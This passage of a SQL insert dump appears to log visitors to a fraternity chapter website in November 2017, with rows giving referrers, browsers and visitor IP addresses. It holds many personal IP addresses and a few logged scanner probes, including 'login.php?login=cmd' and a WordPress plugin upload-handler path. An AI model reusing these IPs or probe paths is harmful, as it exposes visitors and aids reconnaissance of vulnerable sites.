184.76','000',2,0),(13639,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','72.83.139.65','000',2,0),(13640,'2017-11-06','https://zphiblgz.org','Safari','iPhone','10.0','','204.126.132.241','000',4,0),(13641,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','98.233.132.154','000',2,0),(13642,'2017-11-06','https://www.facebook.com/','Chrome','Windows','61.0.3163.100','','75.182.11.235','000',14,0),(13643,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','108.28.165.91','000',2,0),(13644,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','172.73.77.154','000',2,0),(13645,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','166.137.244.45','000',2,0),(13646,'2017-11-06','http://m.facebook.com/','Chrome','Android','56.0.2924.87','','172.58.184.210','000',2,0),(13647,'2017-11-06','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','68.33.90.157','000',2,0),(13648,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','174.218.4.122','000',2,0),(13649,'2017-11-06','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','73.184.175.135','000',2,0),(13650,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','96.244.55.10','000',3,0),(13651,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','186.84.110.102','000',2,0),(13652,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','68.134.117.82','000',2,0),(13653,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','71.56.214.151','000',2,0),(13654,'2017-11-06','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','76.205.168.166','000',2,0),(13655,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','68.134.78.55','000',2,0),(13656,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','98.233.149.14','000',2,0),(13657,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','142.196.198.49','000',2,0),(13658,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','68.106.181.168','000',2,0),(13659,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','70.117.129.175','000',2,0),(13660,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','166.137.244.46','000',2,0),(13661,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','602.3.12','','172.58.152.194','000',2,0),(13662,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','98.218.109.184','000',2,0),(13663,'2017-11-06','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','73.13.107.63','000',2,0),(13664,'2017-11-06','http://m.facebook.com','AppleWebKit','iPod','604.3.5','','98.233.246.107','000',2,0),(13665,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','72.69.167.102','000',2,0),(13666,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','602.2.14','','66.87.133.230','000',2,0),(13667,'2017-11-06','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','73.213.143.247','000',2,0),(13668,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','69.255.230.12','000',2,0),(13669,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','172.58.184.180','000',2,0),(13670,'2017-11-06','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','71.121.204.212','000',2,0),(13671,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','100.36.88.200','000',2,0),(13672,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','108.3.166.147','000',2,0),(13673,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','66.87.81.196','000',2,0),(13674,'2017-11-06','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','204.77.136.157','000',2,0),(13675,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','174.218.8.203','000',2,0),(13676,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','67.11.196.18','000',2,0),(13677,'2017-11-06','http://m.facebook.com','AppleWebKit','iPad','603.3.8','','100.16.122.234','000',2,0),(13678,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','69.143.35.179','000',1,0),(13679,'2017-11-06','https://zphiblgz.org','Chrome','Android','56.0.2924.87','','166.137.244.28','000',2,0),(13680,'2017-11-06','http://zphiblgz.org/scholarship/','Chrome','Android','56.0.2924.87','','107.77.204.69','000',1,0),(13681,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','66.87.81.176','000',2,0),(13682,'2017-11-06','http://site.ru','Chrome','Windows','5.0.375.99','','78.110.50.106','000',2,0),(13683,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','100.36.95.48','000',2,0),(13684,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','136.59.233.107','000',2,0),(13685,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','99.69.140.45','000',2,0),(13686,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','68.54.246.23','000',2,0),(13687,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','67.172.17.109','000',2,0),(13688,'2017-11-06','http://m.facebook.com','AppleWebKit','iPod','604.1.38','','32.210.166.187','000',2,0),(13689,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','602.2.14','','166.216.165.23','000',2,0),(13690,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','173.64.76.231','000',2,0),(13691,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','76.100.71.161','000',2,0),(13692,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','108.48.97.27','000',2,0),(13693,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','107.77.85.66','000',2,0),(13694,'2017-11-06','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','76.254.198.56','000',2,0),(13695,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.212.72.247','000',2,0),(13696,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.83.148.182','000',2,0),(13697,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','108.48.90.186','000',2,0),(13698,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','108.73.109.210','000',2,0),(13699,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','173.9.27.57','000',2,0),(13700,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','66.87.80.216','000',1,0),(13701,'2017-11-07','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(13702,'2017-11-07','https://zphiblgz.org','MSIE','Windows','11.0','','46.39.76.150','000',2,0),(13703,'2017-11-07','https://zphiblgz.org','Firefox','Windows','40.1','','189.91.157.4','000',3,0),(13704,'2017-11-07','http://m.facebook.com/','Chrome','Android','62.0.3202.84','','96.244.188.194','000',3,0),(13705,'2017-11-07','http://site.ru','Chrome','Windows','5.0.375.99','','89.42.216.164','000',22,0),(13706,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','98.218.28.222','000',2,0),(13707,'2017-11-07','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','71.244.188.26','000',2,0),(13708,'2017-11-07','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','118.70.7.99','000',1,0),(13709,'2017-11-07','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','210.245.31.16','000',2,0),(13710,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','174.74.90.99','000',2,0),(13711,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','166.216.165.61','000',2,0),(13712,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.56','000',1,0),(13713,'2017-11-07','http://site.ru','Chrome','Windows','5.0.375.99','','176.31.248.150','000',4,0),(13714,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','601.1.46','','108.35.94.37','000',2,0),(13715,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.4.5','','96.244.119.75','000',2,0),(13716,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.52','000',1,0),(13717,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.96.208','000',2,0),(13718,'2017-11-07','https://zphiblgz.org','MSIE','Windows','9.0','','138.197.96.208','000',2,0),(13719,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','69.250.124.70','000',2,0),(13720,'2017-11-07','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','85.248.227.163','000',1,0),(13721,'2017-11-07','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','93.115.95.205','000',1,0),(13722,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.116','000',1,0),(13723,'2017-11-07','https://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(13724,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','166.137.240.55','000',2,0),(13725,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','24.125.183.82','000',2,0),(13726,'2017-11-07','android-app://com.google.android.googlequicksearchbox','Chrome','Android','61.0.3163.98','','208.54.35.133','000',2,0),(13727,'2017-11-07','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','174.227.131.73','000',2,0),(13728,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','174.204.11.69','000',2,0),(13729,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','166.137.240.120','000',2,0),(13730,'2017-11-07','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.137','000',1,0),(13731,'2017-11-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.138','000',1,0),(13732,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','71.68.11.188','000',2,0),(13733,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','131.171.200.14','000',2,0),(13734,'2017-11-07','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','50.225.39.87','000',7,0),(13735,'2017-11-07','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','107.1.14.78','000',2,0),(13736,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','166.137.244.79','000',2,0),(13737,'2017-11-07','https://www.facebook.com/','Chrome','Windows','61.0.3163.100','','173.79.2.161','000',3,0),(13738,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.28','000',1,0),(13739,'2017-11-07','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','173.79.2.161','000',10,0),(13740,'2017-11-07','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','174.205.5.188','000',3,0),(13741,'2017-11-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(13742,'2017-11-07','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.127','000',1,0),(13743,'2017-11-07','https://t.co/dozk3WHLgh?amp=1','Chrome','Android','62.0.3202.84','','96.88.237.118','000',2,0),(13744,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','174.205.15.80','000',5,0),(13745,'2017-11-07','https://www.google.com/','Chrome','Windows','61.0.3163.100','','207.157.17.250','000',2,0),(13746,'2017-11-07','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.187','000',2,0),(13747,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','206.173.105.122','000',2,0),(13748,'2017-11-07','http://m.facebook.com/','Chrome','Android','62.0.3202.84','','69.255.13.213','000',2,0),(13749,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.135.98.53','000',2,0),(13750,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','174.100.42.63','000',2,0),(13751,'2017-11-07','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(13752,'2017-11-07','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','69.143.14.3','000',2,0),(13753,'2017-11-07','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','199.30.24.38','000',1,0),(13754,'2017-11-07','https://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.159','000',2,0),(13755,'2017-11-07','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','184.0.125.218','000',1,0),(13756,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.58','000',13,0),(13757,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','172.56.2.158','000',2,0),(13758,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','172.58.185.132','000',2,0),(13759,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','174.205.17.121','000',2,0),(13760,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','66.87.81.252','000',3,0),(13761,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','73.250.72.208','000',2,0),(13762,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','208.54.35.213','000',2,0),(13763,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','66.87.80.142','000',2,0),(13764,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','68.134.85.192','000',2,0),(13765,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','71.244.183.229','000',2,0),(13766,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','601.1.46','','73.212.98.175','000',2,0),(13767,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.18.148','000',2,0),(13768,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','601.1.46','','201.19.172.218','000',2,0),(13769,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','71.121.139.173','000',2,0),(13770,'2017-11-07','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','66.87.97.245','000',2,0),(13771,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','100.15.248.150','000',2,0),(13772,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.250.102.136','000',2,0),(13773,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.129.218.99','000',2,0),(13774,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','96.255.182.21','000',2,0),(13775,'2017-11-07','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','99.116.100.241','000',1,0),(13776,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.250.22.75','000',2,0),(13777,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','71.244.179.36','000',2,0),(13778,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','71.244.178.168','000',2,0),(13779,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','24.126.86.155','000',2,0),(13780,'2017-11-07','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.188','000',1,0),(13781,'2017-11-07','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.103','000',1,0),(13782,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','66.87.81.152','000',2,0),(13783,'2017-11-07','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','98.204.254.98','000',2,0),(13784,'2017-11-07','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','71.166.32.48','000',2,0),(13785,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','205.201.132.14','000',12,0),(13786,'2017-11-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.84','000',1,0),(13787,'2017-11-07','http://m.facebook.com','AppleWebKit','iPad','603.2.4','','72.209.1.40','000',2,0),(13788,'2017-11-07','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','93.115.95.206','000',1,0),(13789,'2017-11-07','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','69.143.152.71','000',2,0),(13790,'2017-11-07','https://zphiblgz.org','MetaURI','Unknown','Unknown','','136.243.154.95','000',3,0),(13791,'2017-11-07','https://zphiblgz.org','MetaURI','Unknown','Unknown','','94.130.15.91','000',3,0),(13792,'2017-11-07','https://zphiblgz.org','Firefox','Linux','44.0','','45.33.86.111','000',3,0),(13793,'2017-11-07','https://zphiblgz.org','Firefox','Linux','1.5.0.9','','144.76.23.15','000',2,0),(13794,'2017-11-07','https://zphiblgz.org','MSIE','Windows','10.0','','23.96.208.137','000',2,0),(13795,'2017-11-08','https://zphiblgz.org','Firefox','Windows','2.0.0.6','','34.228.130.247','000',2,0),(13796,'2017-11-08','http://zphiblgz.org/scholarship/','Unknown','Unknown','Unknown','','52.203.144.58','000',1,0),(13797,'2017-11-08','http://zphiblgz.org/scholarship/','Unknown','Unknown','Unknown','','23.20.94.83','000',1,0),(13798,'2017-11-08','http://zphiblgz.org/scholarship/','Unknown','Unknown','Unknown','','52.55.244.20','000',1,0),(13799,'2017-11-08','http://zphiblgz.org/scholarship/','Unknown','Unknown','Unknown','','34.238.102.202','000',1,0),(13800,'2017-11-08','https://zphiblgz.org','Safari','iPhone','9.0','','221.13.12.253','000',1,0),(13801,'2017-11-08','https://zphiblgz.org','Safari','iPhone','9.0','','150.255.10.162','000',1,0),(13802,'2017-11-08','http://site.ru','Chrome','Windows','5.0.375.99','','46.229.144.110','000',1,0),(13803,'2017-11-08','http://zphiblgz.org/scholarship/','Unknown','Unknown','Unknown','','34.237.241.231','000',1,0),(13804,'2017-11-08','http://zphiblgz.org/scholarship/','Unknown','Unknown','Unknown','','52.70.158.78','000',1,0),(13805,'2017-11-08','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.69','000',1,0),(13806,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','100.16.185.109','000',2,0),(13807,'2017-11-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.35','000',1,0),(13808,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','207.172.122.190','000',2,0),(13809,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','69.143.141.44','000',2,0),(13810,'2017-11-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.84','000',1,0),(13811,'2017-11-08','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','163.172.56.209','000',1,0),(13812,'2017-11-08','zphiblgz.org','Chrome','Windows','50.0.2661.75','','188.165.193.197','000',1,0),(13813,'2017-11-08','https://zphiblgz.org','Firefox','Windows','56.0','','50.225.39.90','000',8,0),(13814,'2017-11-08','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','54.184.200.202','000',2,0),(13815,'2017-11-08','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.196.40','000',1,0),(13816,'2017-11-08','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.139.222','000',1,0),(13817,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.132.135.151','000',2,0),(13818,'2017-11-08','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','174.200.23.236','000',2,0),(13819,'2017-11-08','https://zphiblgz.org','Firefox','Linux','38.0','','132.147.66.18','000',2,0),(13820,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','95.91.242.97','000',2,0),(13821,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','174.214.5.53','000',2,0),(13822,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','174.205.7.231','000',2,0),(13823,'2017-11-08','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',1,0),(13824,'2017-11-08','https://zphiblgz.org','Firefox','Windows','34.0','','176.120.55.100','000',1,0),(13825,'2017-11-08','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','66.240.236.119','000',3,0),(13826,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','174.205.12.102','000',2,0),(13827,'2017-11-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(13828,'2017-11-08','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(13829,'2017-11-08','https://zphiblgz.org','Firefox','Macintosh','56.0','','69.140.136.229','000',10,0),(13830,'2017-11-08','https://zphiblgz.org','Firefox','Windows','40.1','','207.172.88.192','000',3,0),(13831,'2017-11-08','https://zphiblgz.org','Firefox','Windows','40.1','','37.56.89.135','000',3,0),(13832,'2017-11-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.117','000',1,0),(13833,'2017-11-08','https://www.bing.com/','MSIE','Windows','11.0','','159.45.186.41','000',2,0),(13834,'2017-11-08','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(13835,'2017-11-08','http://zphiblgz.org/','MSIE','Windows','11.0','','91.233.116.219','000',1,0),(13836,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','96.244.122.155','000',2,0),(13837,'2017-11-08','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','100.16.148.189','000',2,0),(13838,'2017-11-08','http://www.zphibmaryland.org/lambda-gamma-zetas-roller-skating-jam-event/','Chrome','Macintosh','62.0.3202.62','','74.141.4.47','000',3,0),(13839,'2017-11-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','74.141.4.47','000',3,0),(13840,'2017-11-08','https://zphiblgz.org','Chrome','Macintosh','42.0.2349.25','','198.12.72.56','000',2,0),(13841,'2017-11-08','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','99.116.100.241','000',1,0),(13842,'2017-11-08','https://www.google.com/','Chrome','Windows','61.0.3163.100','','24.242.42.19','000',1,0),(13843,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','76.98.19.41','000',2,0),(13844,'2017-11-08','https://zphiblgz.org','Safari','iPhone','11.0','','98.233.170.205','000',4,0),(13845,'2017-11-08','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13846,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','601.1.46','','166.137.143.64','000',2,0),(13847,'2017-11-08','https://zphiblgz.org','Firefox','Windows','34.0','','94.25.228.65','000',1,0),(13848,'2017-11-08','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','108.56.247.227','000',2,0),(13849,'2017-11-09','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.131','000',2,0),(13850,'2017-11-09','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.22.230','000',2,0),(13851,'2017-11-09','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.233','000',2,0),(13852,'2017-11-09','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.71','000',2,0),(13853,'2017-11-09','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.55','000',2,0),(13854,'2017-11-09','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.178','000',2,0),(13855,'2017-11-09','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.13','000',1,0),(13856,'2017-11-09','https://www.google.com/','Chrome','Macintosh','61.0.3163.100','','174.53.25.28','000',4,0),(13857,'2017-11-09','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','74.85.210.85','000',2,0),(13858,'2017-11-09','http://m.facebook.com','AppleWebKit','iPhone','602.1.50','','70.214.74.59','000',2,0),(13859,'2017-11-09','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(13860,'2017-11-09','http://us11.campaign-archive.com/?u=e3e857a830f2d15e874240977&id=e6ad7344a3&platform=hootsuite/?u=e3e857a830f2d15e874240977&id=e6ad7344a3&awesome=no&e=','Chrome','Android','62.0.3202.84','','96.244.232.248','000',3,0),(13861,'2017-11-09','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.8','000',1,0),(13862,'2017-11-09','https://zphiblgz.org/history/','Chrome','Linux','41.0.2272.118','','66.249.80.10','000',1,0),(13863,'2017-11-09','http://site.ru','Chrome','Windows','5.0.375.99','','89.111.176.241','000',1,0),(13864,'2017-11-09','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','96.5.124.23','000',3,0),(13865,'2017-11-09','http://zphiblgz.org/service/appa/','Safari','iPhone','7.0','','157.55.2.191','000',1,0),(13866,'2017-11-09','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.141','000',1,0),(13867,'2017-11-09','https://zphiblgz.org','Firefox','Windows','56.0','','50.225.39.71','000',13,0),(13868,'2017-11-09','https://zphiblgz.org','Firefox','Windows','40.1','','41.102.246.175','000',3,0),(13869,'2017-11-09','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(13870,'2017-11-09','https://www.google.com/','Chrome','Windows','61.0.3163.100','','156.56.153.206','000',2,0),(13871,'2017-11-09','http://zphiblgz.org/','Chrome','Windows','32.0.1700.107','','155.133.82.64','000',3,0),(13872,'2017-11-09','http://www.zphibmaryland.org/chapters/','Chrome','iPhone','62.0.3202.70','','172.56.3.129','000',6,0),(13873,'2017-11-09','http://site.ru','Chrome','Windows','5.0.375.99','','176.31.248.150','000',2,0),(13874,'2017-11-09','https://zphiblgz.org','Chrome','Windows','26.0.1410.58','','5.9.145.132','000',1,0),(13875,'2017-11-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(13876,'2017-11-09','https://zphiblgz.org','AppleWebKit','iPhone','604.3.5','','166.137.244.92','000',6,0),(13877,'2017-11-09','https://zphiblgz.org','AppleWebKit','iPhone','604.3.5','','107.77.204.98','000',3,0),(13878,'2017-11-09','https://zphiblgz.org','Safari','iPhone','10.0','','204.126.132.241','000',2,0),(13879,'2017-11-09','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','208.76.113.5','000',4,0),(13880,'2017-11-09','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','131.171.200.14','000',2,0),(13881,'2017-11-09','http://site.ru','Chrome','Windows','5.0.375.99','','78.110.50.106','000',2,0),(13882,'2017-11-09','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','100.16.222.166','000',3,0),(13883,'2017-11-09','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(13884,'2017-11-09','http://site.ru','Chrome','Windows','5.0.375.99','','85.95.146.71','000',2,0),(13885,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.125','000',1,0),(13886,'2017-11-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(13887,'2017-11-09','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.112','000',1,0),(13888,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','151.236.51.83','000',1,0),(13889,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.210.23.174','000',1,0),(13890,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','81.169.144.135','000',1,0),(13891,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','23.91.70.128','000',1,0),(13892,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','98.130.2.64','000',1,0),(13893,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','38.107.67.39','000',1,0),(13894,'2017-11-09','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.216','000',1,0),(13895,'2017-11-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.23','000',1,0),(13896,'2017-11-09','http://site.ru','Chrome','Windows','5.0.375.99','','192.145.239.41','000',2,0),(13897,'2017-11-09','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','192.3.220.227','000',3,0),(13898,'2017-11-09','https://zphiblgz.org/','Opera','Windows','12.17','','192.3.220.227','000',3,0),(13899,'2017-11-10','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.212','000',1,0),(13900,'2017-11-10','http://zphiblgz.org/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','Chrome','Windows','42.0.2311.152','','209.90.225.243','000',1,0),(13901,'2017-11-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.77','000',1,0),(13902,'2017-11-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1601.yXLaHonSCwa7QVBPQdcKKooqZf2rGS7KIuG64bNJA-DUrQ8C-CUi8sr3ODgFKCPR.19057d837e46bf10a44bda698e2a9ef515afd412&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWTFpUeUVaNjZCRU9BYW1ENmNBQV9qeFl1bDJiYVpSS2tQblpLd